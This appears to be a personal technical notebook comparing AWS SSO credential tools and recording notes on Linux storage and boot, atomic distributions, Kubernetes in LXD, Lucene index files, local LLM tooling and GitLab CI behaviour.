  • credentials: it has the regions and uses a credentials_process helper that points to go-aws-sso assume. The later fetches the SSO access token then uses it to GetRoleCredentials for the specified role.
credential_process = /opt/home/theodo/.local/bin/go-aws-sso assume -q -a 339712704276 -n ReadOnly
  • sso/cache folder: it contains two files access-token.json which contain SSO credentials and last-usage which contains metadata about the currently (or latest) used profile.

Deal breaker

The tool is simple and minimalist, but it does not work for a complex setup. It is like a tool to connect to whatever profile (account+role) we need, fast. It support one SSO instance at a time and one profile at a time. In addition to that, it does drift a lot from the default aws cli behavior.

  1. It creates its own SSO cached credentials with its own format. and adds a new file last-usage.json
  2. It does not rely on .aws/config file.
  3. It creates a default .aws/credentials and point to assume which generates temporary credentials.
  4. [Not Sure] The credentials are not cached anywhere which means the assume is called every time.

Pros

  • It works
  • Simple to use.
  • Single Go binary
  • Can run in headless mode (outputs the url instead of opening a new browser tab)

Cons

  • Supports only one SSO instance
  • Does not configure environment variables.
  • Does not adhere to the AWS SSO philosophy.
  • Weird and kind of opinionated! It uses the credentials file with sso authentication. And it creates files and configs in the format specified by them. -> The tool uses the AWS SSO API to fetch temporary credentials (Access Key ID, Secret Access Key, Session Token) for the chosen role. Then it either uses credential_process which configures go-aws-sso to be the credentials provider. Or persist which write a short lived credentials (keys) into the credentials file.

ssosync

This is awslabs tools which populates AWS SSO from G Suite

aws-vault

Manager for AWS credentials. It stores the creds in the machine keystore (e.g. pass) and when it is invoked it uses the STS to generate temporary credentials via the GetSessionToken or AssumeRole API calls.

Then it injects the temporary credentials into the process when aws-vault exec. Key Difference: SSO commands are SSO-centric (federated access, no stored IAM keys needed), while aws-vault is credential-vault-centric (stores IAM keys securely and creates temporary sessions). SSO is for identity federation; aws-vault is for credential isolation.

It does not match the use case.

awsesh

This is fairly new, written in Go as a TUI. It is almost the same as go-aws-sso, since it also uses sso API to generate temporary credentials and store them in credentials.

How it works

It authenticate to SSO instance and then it creates the following files:

  • awesesh: contains the information about the SSO instance. And the account used.
  • awesesh-account: contains all the accounts and associated roles. It may be used for caching purposes.
  • awsesh-tokens: contains the tokens for the SSO instance
  • credentials: contains static credentials generates when logging in to the account/role in awsesh.

Deal breaker

Although this is more beautiful, it is almost the same as go-aws-sso. It is not for complex setup but it is intended for daily use. It simplifies switching but not configuration oriented. Also it is opinionated and uses it own conventions compared to native aws sso cli. It has the same drawbacks as go-aws-sso but it uses static credentials which is supported by go-aws-sso.

Pros

  • TUI
  • Simple to use
  • Single Go Binary
  • Supports many SSO Orgs

Cons

  • No Documentation
  • New and kind of vibecoded
  • Opinionated and does not rely on the aws config file conventions themselves.
  • Support one profile (support for multiple profiles has been added).

yawsso

This seems not maintained (latest release in 2024). This is same as go-aws-cli. It syncs SSO to regular AWS credentials.

:point_down_tone4::point_down_tone4: Generated by AI :point_down_tone4::point_down_tone4:

yawsso works by:

  1. Reading AWS config profiles – It parses your ~/.aws/config file to identify which profiles are using SSO (with sso_start_url, sso_region, sso_account_id, sso_role_name).
  2. Extracting cached SSO session – It finds the corresponding session in the ~/.aws/sso/cache/ files created by aws sso login.
  3. Calling AWS SSO OIDC APIs (via boto3/AWS SDK) – With that cached SSO access token, yawsso requests temporary AWS credentials (access key, secret, session token) for the given account and role, just like the CLI would internally.
  4. Writing credentials to legacy store – It then writes those credentials into the legacy ~/.aws/credentials file under the selected or mapped profile names (e.g., dev, prod, or foo if you rename).
  5. Optional extras – It can also export them into environment variables (-e), copy them to the clipboard, or refresh them automatically when expired (auto).

:point_up_2_tone4::point_up_2_tone4: Generated by AI :point_up_2_tone4::point_up_2_tone4:

aws-sso-util

How it works

It connects to the SSO instances and pull all the profiles to .config file. Then it logs in once to the SSO instance. And when a profile is used by aws CLI, it uses SSO API to get credentials.

The behavior is the closest you can get to the native SSO CLI.

Pros

  • Use the same features as the native aws sso cli
  • Manages .config file instead of adding new files
  • Login once and switch between the accounts
  • Simple to use.
  • It adds an credential-helper in config file for AWS SDKs that don't support SSO.
  • It has a lib

Cons

  • configure command does not support the latest .aws/config format to infer sso information form the it.
  • configure does not take the information from the CLI directly. In fact it does support providing the SSO fields through environment variables, inference through aws config file, or with command line option. (-u and --sso-region)
  • Loose support for multiple SSO instances. If 2 instances have the same account the second configure overrides the first.

aws-sso-cli

Powerfull aws-sso tool, intended to replace aws cli altogether.

How it works

The aws-sso-cli differs so much from the vanilla aws cli. It relies on a yaml file in XDG_CONFIG_HOME. The config is generated by setup command and contains the SSO instance configuration as well as the cli configuration. It also creates other files:

  • config.yaml: see above
  • cache.json: contains cached roles (with accounts and aliases)
  • secure/: a Folder with encrypted credentials.

Deal Breaker

Simple put: It is too complex for me + it is so opinionated.

  • It is very powerful and offers a lot of features and options but it has its own way to do things. As for me, I really want to me as minimalist as possible and rely on vanilla tools or tools that follows the standards from AWS tooling.
  • It has so much to learn, and offers a lot of NON-STANDARD ways to do things (mainly assume roles or connect to profiles). Although it can be configured to follow aws cli v2 standards, I don't think it is worth it at least at the stage I am on right now. Maybe in the future, my workflow will get so much complex and will require using something like this tool.

Pros

  • Powerful
  • Very good documentation
  • Feature rich
  • Supports encryption for credentials

Cons

  • Complex
  • So opinionated! Although it replaces aws cli v2 entirely and comes with it own philosophy and interface.

AWSume: AWS Assume Made Awesome! | AWSume

This is more to replace aws assume role.

References

Linux

Storage

SSDs

Types of SSDs:

  • Form Factors:
    • 2.5" : looks like an HDD, slower, only supports SATA.
    • M.2: They come in few standard lengths (60mm, 80mm, 110mm), they support two interfaces:
      • SATA
      • PCIe (with and without NVMe support)
    • Add-in Card (AIC): Bigger than M.2 and operates over PCIe.
    • mSATA: looks like M.2, very small
    • U.2: Looks like 2.5" but they way faster. They are mainly used in the enterprise (Data centers)

NVME (Non-Volatile Memory Express):

  • is a super fast way to access SSDs and flash memory (NVM)
  • NVMe is not an interface and not a form factor (like SATA or PCIe) but a data transfer protocol
  • SSDs used SATA -> PCIe (lack of standard and features) -> NVMe

Lots of videos at the bottom of the page

PCIe

  • Each PCIe interface can be configured with 1 lane or multiple lanes x4 (x4, x8, x16 and x32).
  • Each PCIe Generation doubles the bandwidth
  • PCIe is backward compatible (The interface and card settle on the lower version)
  • PCIe cards can be plugged in slots with different number of lanes with the consequence of having less bandwidth or wasted lanes.

Hard disk drive interface

  • PATA(IDE) - SCSI: Old interfaces
  • SATA: Personal HDD, successor of PATA
  • SAS: Entreprise HDD, successor of SCSI
  • More and More

Disks and Partitions

partitioning formats

There are 2 known partioning formats:

  • MBR: 2TB is the limit disk size, can only create 4 primary partitions, the last one is set to extended partition in which we can create Logical partitions.
  • GPT: No disk limit, no limit for partition size. The partition table information is available in multiple locations to guard against corruption. GPT can also write a “protective MBR” which tells MBR-only tools that the disk is being used.

/dev/sd* vs /dev/disks:

  • The Linux kernel decides which device gets which name (/dev devices) on each boot. which can lead to to confusion and unwanted behavior.
  • /dev/disks has many subfolders that points to the partitions using other parameters besides the device name (label, id, uuid ...)

Boot

BIOS

The BIOS in modern PCs initializes and tests the system hardware components (Power-on self-test), and loads a boot loader from a mass storage device which then initializes a kernel. In the era of DOS, the BIOS provided BIOS interrupt calls for the keyboard, display, storage, and other input/output (I/O) devices that standardized an interface to application programs and the operating system. More recent operating systems do not use the BIOS interrupt calls after startup.[6]

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, BIOS initializes the hardware required for booting (disk, keyboard controllers etc.).
  • BIOS launches the first 440 bytes (the Master Boot Record bootstrap code area) of the first disk in the BIOS disk order.
  • The boot loader's first stage in the MBR boot code then launches its second stage code (if any) from either:
    • Next disk sectors after the MBR, i.e. the so called post-MBR gap (only on a MBR partition table),
    • A partition's or a partitionless disk's volume boot record (VBR),
    • For GRUB on a GPT partitioned disk—a GRUB-specific BIOS boot partition (it is used in place of the post-MBR gap that does not exist in GPT).
  • The actual boot loader is launched.
  • The boot loader then loads an operating system by either chain-loading or directly loading the operating system kernel.

UEFI

UEFI launches EFI applications, e.g. boot loaders, boot managers, UEFI shell, etc. These applications are usually stored as files in the EFI system partition. Each vendor can store its files in the EFI system partition under the /EFI/vendor_name directory. The applications can be launched by adding a boot entry to the NVRAM or from the UEFI shell.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, UEFI initializes the hardware required for booting (disk, keyboard controllers etc.).
  • Firmware reads the boot entries in the NVRAM to determine which EFI application to launch and from where (e.g. from which disk and partition).
  • A boot entry could simply be a disk. In this case the firmware looks for an EFI system partition on that disk and tries to find an EFI application in the fallback boot path EFIBOOTBOOTx64.EFI (BOOTIA32.EFI on systems with a IA32 (32-bit) UEFI). This is how UEFI bootable removable media work.
  • Firmware launches the EFI application.
    • This could be a boot loader or the Arch kernel itself using EFISTUB.
    • It could be some other EFI application such as the UEFI shell or a boot manager like systemd-boot or rEFInd.
  • If Secure Boot is enabled, the boot process will verify authenticity of the EFI binary by signature.

Atomic Linux Distributions

Approaches to Immutability

Different distributions achieve "immutability" using distinct underlying architecture and tooling.

  • The "Git/Container" Model (OSTree / OCI)

    • Examples: Fedora Atomic, Universal Blue.
    • Tooling: rpm-ostree, bootc.
    • Mechanism: Treats the OS as a versioned repository or container image. Updates are fetched as file deltas or image layers and deployed to a new "deployment" directory on the same partition using hardlinks.
    • Key Trait: Centralized "DevOps" management; allows rebasing the entire OS to a different image/fork.
  • The "Snapshot" Model (Btrfs)

    • Examples: openSUSE Aeon (MicroOS).
    • Tooling: transactional-update.
    • Mechanism: Wraps standard package management. It creates a new read-write Btrfs snapshot of the current root, installs packages into it via zypper, and sets it as the default boot target.
    • Key Trait: Retains standard package management granularity but enforces a "reboot-to-apply" workflow.
  • The "A/B Partition" Model

    • Examples: Vanilla OS, Android, ChromeOS.
    • Tooling: ABRoot.
    • Mechanism: Uses two completely separate physical root partitions (Slot A and Slot B). Updates are written to the inactive partition (via OCI sync or package manager) which is then toggled active for the next boot.
    • Key Trait: Maximum isolation. A failed update or filesystem corruption on the inactive slot has physically zero impact on the running system, at the cost of higher storage usage.

Atomic Linux & Universal Blue: Technical Reference

The Core Architecture

  • Bootable Containers: The OS is delivered as a standard OCI container image.
  • Kernel Management: The kernel is a package inside the container image. It is version-locked to the userspace.
  • Storage Model: Uses a single physical partition with "Deployments" (snapshots) sharing space via hardlinks (OSTree). It does not use A/B physical partitions (unlike Android or VanillaOS).

Universal Blue (uBlue) vs. Fedora

  • Fedora Atomic (e.g. Silverblue):

    • Uses Classic OSTree (Git-like file deltas) by default.
    • Constraint: Cannot ship proprietary drivers (NVIDIA) or codecs due to Red Hat legal/philosophical policies.
  • Universal Blue:

    • Builds on top of Fedora using GitHub Actions.
    • Mechanism: Wraps Fedora content into OCI images.
    • Bypass: Uses GitHub infrastructure to inject proprietary drivers/codecs that Fedora can't ship.

Tooling: rpm-ostree vs bootc

ToolRoleNotes
rpm-ostreeLegacy Client + Build ToolUses ostree-rs-ext to translate OCI layers into OSTree commits on disk. Still used inside Containerfiles to install packages.
bootcModern ClientThe future standard. Treats the container registry as the single source of truth.

System State & Mutability

DirectoryStateBehavior on Update
/usrRead-OnlyCompletely replaced by the new image content.
/varRead-WritePreserved (Logs, Docker images, libvirt).
/homeRead-WritePreserved.
/etcRead-Write3-Way Merge: Compares (1) Old Default, (2) New Default, (3) User Edits. Tries to merge; user edits take precedence.

Operations

Rebasing (Switching Distros)

You can switch entire OS flavors (e.g., Desktop to Gaming) by changing the image source.

# Example: Switch to Bazzite (SteamOS clone)
bootc switch ghcr.io/ublue-os/bazzite:latest

Risk: /home config clutter. Switching Desktop Environments (e.g., GNOME to KDE) can cause theming/config conflicts in dotfiles.

Custom Images (Blue-Build)

  • Workflow: Define OS in recipe.yml (YAML) GitHub Actions builds image Device pulls updates from GHCR.
  • Benefit: Pre-install tools (Terraform, UV, Neovim) in the base image rather than layering them locally.

Recovery Mechanisms

  • Rollback: The previous OS version is always available in the GRUB menu.
  • Pinning: ostree admin pin 0 ensures a specific working deployment is never garbage collected.
  • Critical Failure: Since deployments share a partition, filesystem corruption (superblock) kills all deployments. Requires Live USB recovery.

References

Containers

Cgroups

Privileged access to Cgroups

CGroups can be accessed with various tools:

  • Systemd directives to set limits for services and slices.
  • Through the cgroup FS.
  • Through libcgroup binaries like cgcreate, cgexec and cgclassify.
  • The Rules engine daemon to automatically move certain users/groups/commands to groups (/etc/cgrules.conf and cgconfig.service).
  • Through other software like LXC.

Unprivileged access to Cgroups

Unprivileged users can divide resources using CGroups v2. memory and pids controllers are supported out of the box. cpu and io require delegation.

  • To delegate cgroup resources we should add the Delegate systemd property, and reboot
# /etc/systemd/system/user@1000.service.d/delegate.conf
[Service]
Delegate=cpu cpuset io

Experiment running Kubernetes in LXD

Try 1: Kubernetes storage support

Kubernetes filesystem support

The hardest issue with deploying Kubernetes on LXD/LXC containers is storage and filesystem support:

BTRFS

BTRFS does not work well with kubernetes, due to CAdvisor not playing well with BTRFS

ZFS

ZFS does not work as well on LXC and kubernetes, since it does not bad support for nested containers.

One workaround is creating subvolumes for the container runtime and formatting them in Ext4:

Another Workaround is to have a ZSF enabled containerd in the host and make it accessible inside LXC

There are other solution like using docker loopback plugin ...

Containerd and overlay inside LXC

When running containerd inside LXC, due to Systemd being unable to execute modprobe overlay inside the container (module is already loaded in host kernel).

Containerd is already patched and modprobe errors are ignored.

Cgroups v2 support

Containerd (and runC) supports Cgroups v2 already

I enabled it using this

[plugins]
  [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
    [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
      SystemdCgroup = true

  [plugins.cri.containerd.default_runtime]
    runtime_type = "io.containerd.runc.v2"
    runtime_engine = ""
    runtime_root = ""

Try 2: Weird problem

I have a weird problem now, When setting up a cluster with kubeadm, the containers keep restarting until everything crashes. The same thing with microk8s.

A weirder situation is that K0s works fine!

Hypothesis

There is something related to container technologies that's preventing the containers from running properly.

  • In the case of Kubeadm, the kubernetes components run in containers (containerd in my case).
  • In the case of Microk8s, the components run on top of snapd (to be verified).

--> In this case there should be something preventing them (containers, snaps) from running properly.

To verify this I will do the following experiments

  • Run k3s in LXD, since it uses containerd to run the k8s components, it should fail
  • Install kubernetes the hard way, this way I'll install the components as processes not as containers. In this case Everything should work fine.

Edit: Microk8s works fine, the problem was related to the dns plugin which was disabled for some reason. The reason for which Microk8s reports a not running status. microk8s enable dns and everything is working fine.

Kubeadm downgrade

Downgraded kubeadm from 1.22.0 to 1.20.4 and everything seems to work fine!

Can be a version problem! Digging deeper and maybe getting some help from serverfault.

A new problem arose: kube-proxy won't start and fails with open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

The solution was to set nf_conntrack_max in the host.

sudo sysctl net/netfilter/nf_conntrack_max=131072

Managed to upgrade from 1.20.4 to 1.21.4 to 1.22.1 and the cluster is running almost fine, until they aren't.

For 1.21.4 everything was fine while in 1.22.1 nothing works.

It started with some CrashLoopBackOffs and now everything is down.

When I restart the kubelet, the containers start to show off a minute later, and then enter the crash loop again.

My Hypothesis is that this is a version issue, there is something wrong with v1.22 or with my lxd setup or both. To test that I am doing the following

  • Testing v1.22 using k3s or some other distribution.
  • Testing v1.22 with k8s the hard way.

Also v1.22 supports swap so maybe the problem has something to do with swap. I'll check that too:

Asked at k8s.slack.com and the responses suggested that the etcd server is the reason why everything fail and said that from kubernetes 1.21 to 1.22 etcd moved to 3.5.0

The best way and the least time consuming is Kubernetes the hard way since, it will help me in other thing as well. Ans since k8s distro haven't moved to 1.22 yet.

  • https://github.com/inercia/terraform-provider-kubeadm
  • Use Ansible + Terraform is better maybe

Try 3: New cluster

Going back to this project. This works on 1.31+ with a little bit of tweaking. It may work with previous versions, I have not tested them. Initialized a cluster on a 3 machines LXD container instances.

  • Created 3 LXD container instances using LXD terraform provider and cloud-init

It is weird that LXD cloud images for ubuntu/jammy do not come with sshd installed. So I had to install it manually.

  • Getting the annoying error
285 fs.go:595] Unable to get btrfs mountpoint IDs: stat failed on /dev/nvme0n1p3 with error: no such file or directory` error. But apparently it does not affect the cluster health. See Above for more information about the issue.
  • After initializing the cluster, the kube-proxy pod enter a CrashLoop state. A kubectl logs show that the container was failing with:
conntrack.go:100] Set sysctl 'net/netfilter/nf_conntrack_max' to 131072
server.go:495] open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

Apparently kube-proxy is trying to change the value of nf_conntrack_max even if it does not have the permission to do so. This is maybe related to the way LXC loads the kernel modules (Need to dig more on this).

root@k8s-node-0:~# sysctl -p
sysctl: setting key "net.netfilter.nf_conntrack_max": No such file or directory
sysctl: cannot stat /proc/sys/net/nf_conntrack_max: No such file or directory

The solution was to prevent kube-proxy from changing the nf_conntrack_max value by setting maxPerCore to 0 in the kube-proxy configMap. More

kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s.yaml

References

ElasticSearch

Introduction to Lucene

Ingestion Process

  • Document Creation: User creates a Document object in memory. Data model: Map-like structure with Field objects (e.g., TextField for searchable text, StoredField for retrievable data). Stored in RAM as Java objects.
  • Analysis (Tokenization & Filtering): Tokenize (split into words), Normalize (lowercase, remove stopwords, stem words like "running" → "run").
  • Term Addition to Index: the terms are added to the index in Memoru
  • Segment Flushing: When buffer fills. data is flushed to disk as a new immutable segment
  • Commit & Merging: On commit, segments are merged (background) into larger ones for efficiency

Index Data model

Data model

ls -1 | cut -f2 -d. |sort | uniq
doc
dvd
dvm
fdm
fdt
fdx
fnm
lock
nvd
nvm
pos
segments_4
si
tim
tip
tmd

The most important files are tim, tip, doc and pos. The full model is the following

  • Vocabulary:

    • .tim: Terms Dictionary with All unique terms (words)
    • .tip: Terms Index Pointer/index into .tim
    • .doc: Postings - Frequencies
    • .pos: Postings - Positions
  • Stored Fields (Original Document Storage)

    • .fdt: Field Data - Actual stored field values (like a database)
    • .fdx: Field Index - Pointers to data in .fdt
    • .fdm: Field Metadata - Compression info (Describes field types, analyzers, norms, etc.)
  • Doc Values (Column-oriented Storage)

    • .dvd: Doc Values Data - For sorting/faceting
    • .dvm: Doc Values Metadata
  • Norms (Field Length Normalization)

    • .nvd: Norms Data - Field length info for scoring
    • .nvm: Norms Metadata
  • Metadata Files

    • .fnm: Field Names - Maps field IDs to names.
    • .si: Segment Info - Segment metadata (doc count, codec, version, deleted docs, etc.).
    • .tmd: Term Vector Metadata - For term vector storage. (Extra info for .tim and .tip.)
    • segments_4: Master file listing all segments (Lists all segments, their versions, and commit metadata.)
    • write.lock: Write lock (prevents concurrent writes)

Example

  • The document
# Document
0, "Hello World", "Lucene stores documents efficiently"
1, "Apache Lucene", "Lucene uses segments to store data"
2, "Search Engines", "Elasticsearch is built on Lucene"
  • Metadata files
# .fnm
0: title (indexed=true, stored=true, hasTermVectors=false)
1: body (indexed=true, stored=false, hasNorms=true)

# .tmd: Term Metadata, stores extra metadata about terms (field-level summaries, term stats, checksums).
Field "title": 3 unique terms
Field "body": 6 unique terms
checksum: 0xA32F9C

# .si: Segment Info, describes the whole segment.
Segment name: _2
Lucene version: 9.0
Doc count: 3
Deleted docs: 0
Files: [_2.fdt, _2.fdx, _2.tim, _2.tip, ...]

# segments_4: Commit point, global file listing all segments that make up the index.
Segments:
  _2 (3 docs)
  _3 (7 docs)
  _4 (2 docs)
Generation: 4

# write.lock
hostname=localhost
processId=12345
  • Stored fields
# .fdt: Documents and their stored field 
Doc 0:
  title = "Hello World"
Doc 1:
  title = "Apache Lucene"
Doc 2:
  title = "Search Engines"

# .fdx: offsets for each Doc to help lucene to seek inside .fdt
Doc 0 offset: 0
Doc 1 offset: 34
Doc 2 offset: 71

# .fdm: metadata about how fields are stored and indexed
Field "title":
  type: text
  analyzer: standard
  norms: no
Field "body":
  type: text
  analyzer: standard
  norms: yes
  • Dictionary files
# .tim: Term dictionary for indexed fields
Term Dictionary:
  body: [
    "built" -> docFreq=1, totalTermFreq=1
    "data" -> docFreq=1, totalTermFreq=1
    "elasticsearch" -> docFreq=1, totalTermFreq=1
    "lucene" -> docFreq=2, totalTermFreq=2
    "segments" -> docFreq=1, totalTermFreq=1
    "stores" -> docFreq=1, totalTermFreq=1
  ]
  title: [
    "apache" -> docFreq=1
    "hello" -> docFreq=1
    "search" -> docFreq=1
  ]

# .tip: Pointers for terms in .tim file (for fast seek)
Pointers:
  "apache" → offset 0
  "lucene" → offset 128
  "search" → offset 192

# .doc: Postings (docIDs), lists which documents contain each term. 
Term: "lucene"
  → docIDs = [1, 2]
Term: "search"
  → docIDs = [2]
Term: "hello"
  → docIDs = [0]

# .pos: Positions, word positions within documents (for phrase queries, proximity).
Term: "lucene"
  Doc 1: positions [0]
  Doc 2: positions [4]
  • Doc values (Columnar values)
# .dvd columnar storage for sorting, faceting, analytics.
Field "popularity" (numeric doc values)
Doc 0: 10
Doc 1: 25
Doc 2: 5

# .dvm: contains metadata (like offsets, encodings).
Field count: 2
Field 0: popularity (numeric)
  offset: 0x00000010
  encoding: delta-compressed int
Field 1: category (sorted)
  offset: 0x00000100
  encoding: terms dictionary

  • Norms
# .nvd per-field normalization factors (used in scoring).
Field: body
Doc 0: norm=0.577
Doc 1: norm=0.707
Doc 2: norm=0.5

# .nvm: norms metadata.
Field count: 1
Field 0: body (norms)
  offset: 0x00000000
  encoding: byte
  numDocs: 3

Field Settings

Each field in a lucene document has the following boolean separate settings:

  • indexed: The field is searchable (terms go into the inverted index).
  • stored: The field’s original value is saved so it can be retrieved with the document.
  • docValues: The field’s value is stored in columnar form for sorting, faceting, etc.

Norms

Norms are small numeric factors Lucene computes per field, per document to help with relevance scoring.

They typically encode things like:

  • How long the field is (shorter fields often get a boost),
  • Whether it contains many terms,
  • Field-level boosts applied at indexing time.

These are used when computing the TF-IDF or BM25 score that determines how relevant a document is to a query.

Doc values

Doc values are Lucene’s columnar data store — think of them like a per-field database column.

They’re designed for:

  • Sorting: e.g., sort search results by “price” or “date”
  • Faceting: e.g., count how many documents per “category”
  • Analytics: e.g., compute averages, histograms, or aggregations

Index operations

Deletions

The deletes are soft, each segment has bitset for each doc. 0 is set to set the doc for deletion.

On Segment merge, the segments with higher deleted docs are prioritized.

Updates

Updating a previously indexed document is a “cheap” delete followed by a re-insertion of the document. Updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing values in a Lucene index is probably not a good idea – there is no in-place update of values.

References

LLMs

Running LLMs

Timeline:

Inception

  • Sept 2022: Georgi Gerganov initiated the GGML (Georgi Gerganov Machine Learning) library as a C library implementing tensor algebra with strict memory management and multi-threading capabilities. This foundation would become crucial for efficient CPU-based inference.
  • Mar 2023: llama.cpp built on top of GGML with pure C/C++ with no dependencies. -> LLM execution on standard hardware without GPU requirements.
  • Jun 2023: Ollama Docker-like tool for AI models, simplifying the process of pulling, running, and managing local LLMs through familiar container-style commands. It became the easiest entry point for users wanting to experiment with local models.

Standardization

  • Aug 2023: GGUF format (GGML Universal Format) successor to GGML format. GGUF provided an extensible, future-proof format storing comprehensive model metadata and supporting significantly improved tokenization code.
  • 2024: Multiple tools
    • vLLM emerged as a high-throughput inference server optimized for serving multiple users
    • GPT4All developed into a comprehensive desktop application with over 250,000 monthly active users
    • LM Studio became a popular cross-platform desktop client for model management

The flow

image

Building the model

  • Model is built and trained used PyTorch, Tensorflow, Jax or another framework
  • The frameworks outputs the model weights:
    • JAX/Flax: msgpack checkpoints (flax_model.msgpack) + config.json
    • Tf/Keras: SavedModel directory (saved_model.pb + variables/) or HDF5 file (model.h5)
    • PyTorch: .pt or .pth saved with torch.save(model.state_dict(), "model.pt")
    • ONNX (Open Neural Network Exchange) a cross-framework intermediate format used to transfer models, it has a ONNX runtime which can run it
  • The models can be converted to Hugging Face model formats
    • pytorch_model.bin or model.safetensors → the weights (can be multiple shards if big).
    • config.json → architecture hyperparameters (hidden size, number of layers, etc.).
    • tokenizer.json, tokenizer.model, special_tokens_map.json, etc. → tokenizer files.
    • generation_config.json → default generation params.

model.safetensors is a safe, zero-copy serialization format for tensors. Alternative to PyTorch’s pickle-based .bin (which can execute arbitrary code on load — unsafe). And supports other frameworks like TF and Jax. And it is convertible to GGUF and other formats and can be run by vLLM natively.

Running the models (vLLM vs llama.cpp)

  • vLLM: Runs the model in HF format (Inference). It can start a inference server with OpenAI-compatible API
  • The model can be converted further (compiled into) to TensorRT which is NVIDIA’s inference optimization runtime (For all DL models). It takes a model in any format (PyTorch, ONNX) and compiles it into a TensorRT engine .plan file highly optimized for Nvidia GPUs. (This is used if we are targeting Nvidia GPUs)

vLLM doesn’t use TensorRT by default (it uses its own kernel tricks), but you could use TensorRT separately.

  • In Apple Silicon the model can be converted using MLX to use the Integrated Memory. MLX optimized the model for inference in Apple Silicon (quantization for example)
  • Convert the model from HF format to GGUF format (Quantization).
  • Run the GGUF on llama.cpp on CPU and low resource hardware.

Running the models as a user

  • Create a Modelfile to package the model a la Dockerfile.
FROM ./model-q4_k_m.gguf
PARAMETER temperature 0.7
TEMPLATE """{{ .Prompt }}"""
  • Build the model ollama create mymodel -f Modelfile and run it ollama run mymodel.

  • We can push/pull the model.

  • While ollama is developer friendly/focused, there are other tools geared towards end users like gpt4all and LM studio (GUI first, marketplace, builtin chat ui ...)

  • Common AI Model Formats

Running Local LLMs

Prerequisites

  • CUDA: Application programming interface for Nvidia GPUs
  • AMD ROCm is an open software stack including drivers, development tools, and APIs that enable GPU programming from low-level kernel to end-user applications.
  • Intel OneApi: Same but has a different goal, trying to standardize computation over CPU and GPUs and FPGAs ...

Inference Engines

image

Serving Frameworks

image These are serving frameworks in the sense that they do the entire thing including compression, deployment, Serving, memory management, Caching ... While the previous category only runs the model on the hardware (with some optimization but not a fully fledged framework). -LMDeploy: it is also a solution for running LLMs (Inference).

Dev Oriented

  • Ollama: Uses docker like concepts to manage and run models
  • LocalAI:
    • It supports a lot of backends including llama.cpp, vllm, and hf transformers ...
    • It support Hardware acceleration on various models.
    • If I can say it is the most complete but it feels cumbersome.
    • It support a declarative way to define models.
    • It is container first. Run with container images | LocalAI
  • mozilla-ai/llamafile: 1 executable file models (it relies on llama.cpp)

Containers

  • Ramalama:
    • Supports multiple transports (ollama:// hf:// and oci:// and ModelScope://)
    • ramalama support 3 runtimes: ollama.cpp, vllm and mlx.
    • It starts a container image with everything needed to run the model including optimizations. On run ramalama detects the GPU information and decides which image to use.
  • Docker:
    • Same but the ai models are not standard OCI images, which make them not pull-able from ramalama
    • Docker has introduced ability to run MCP servers.

GUIs

tools

Expose reports artifacts to next jobs

To expose reports artifacts to next jobs we use artifacts:paths

job:
  artifacts:
    paths:
      - report-name.json
    reports:

Terraform templates

There are 3 gitlab-ci.yml terraform template file.

  1. Base: Contains hidden jobs to do different base tasks
  2. Base.Latest: Same as Base but with the latest terraform image
  3. Latest: Contains 4 jobs that use Base to do the underlying tasks

Include doesn't support anchor scripts

Gitlab CI doesn't play well with script overriding and includes

include: 
  - local: '.gitlab/ci/frontend.yml'

Client Tests:
  extends: .g-frontend-lint-test
  variables:
    CACHE_COMPRESSION_LEVEL: "fast"
  script:
    - *yarn-lint-script
    - *yarn-test-script
  stage: test
  needs: ["Client Install Deps"]

You can’t use YAML anchors across different YAML files sourced by include. You can only refer to anchors in the same file. To reuse configuration from different YAML files, use !reference tags or the extends keyword.

This makes sense since include is a gitlab CI syntax and anchor are yaml syntax. So including a CI file does not imply the inclusion of all the yaml syntax.

I suggest you try to use the !reference or the extends keywords.

Jobs: Grouping

Joint commands bug

Gitlab CI scripts have a weird bug.

If multiple commands are combined into one command string, only the last command’s failure or success is reported Source

The bug is discussed thoroughly here!(should read) Source

There is another bug with mono-line commands. Mostly related to the same bug. Source

Non blocking manual jobs

Manual jobs block the pipelines .i.e Pipelines won't have a success status until the manual jobs are run.

To allow pipelines to succeed even if the manual jobs are not run, we should specify allow_failure on them.

- if: '$CI_MERGE_REQUEST_IID'
  when: manual
  # If this is not specified the pipline will be blocked until
  # the job is run manually
  allow_failure: true 

Triggers

  • We use trigger to define downstream pipeline trigger. When a trigger job starts a downstream pipeline is created.
  • trigger is user to create multi-project pipelines.
  • trigger can be used in conjunction with a small set of keywords.

rule:changes in MR pipelines

In an MR pipelines rules:changes uses git diff from the parent refs, an not from the last pushed commit.

test:
  ...
  rules:
    - if: $CI_PIPELINE_SOURCE == "merge_request_event"
      changes:
        - api/*
    ...

If we make changes to api/* in the first commit pushed to the MR, the test job will be created for all the next commits pushed to the MR even if we don\t make changes to api/*.

More in this issue

rules:if does not support job local variables.

rules:if does does not access variables from the same job they are declared on.

The following job will run on master and preprod.

variables:
  BRANCH_REGEX: '/staging|preprod|master|demo/'

workflow:
  rules:
    - if: '$FORCE_GITLAB_CI'
    - if: '$CI_MERGE_REQUEST_IID'
      # REGEX IN VARIABLE
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

rules-override-workflow-with-variables:
  variables:
    BRANCH_REGEX: '/staging|demo/'
  script:
    - echo "testing rules override workflow with variables"
  rules:
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

!reference and arrays

Up to 14.02 !reference is not useful with arrays, outside of script tag variants. Since it inserts nested arrays, instead of flattening them.

script tags support nested arrays, so they work fine with !reference.

More on this issue

rules overrides workflow:rules

rules overrides workflow:rules and doesn't merge with them. workflow:rules are evaluated first to create the pipeline or not. Then rules are evaluated for each job.

workflow:
  rules:
    - if: '$FORCE_GITLAB_CI'
    - if: '$CI_MERGE_REQUEST_IID'
      # REGEX IN VARIABLE
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

when-with-rules-over-workflow:
  script:
    - echo "testing when with rules over workflow"
  rules:
    - if: '$CI_MERGE_REQUEST_IID'
      when: manual

The when-with-rules-over-workflow: job will run on MRs only and not on the BRANCH_REGEX.

Rules' variables

We can set variables for rules:if.

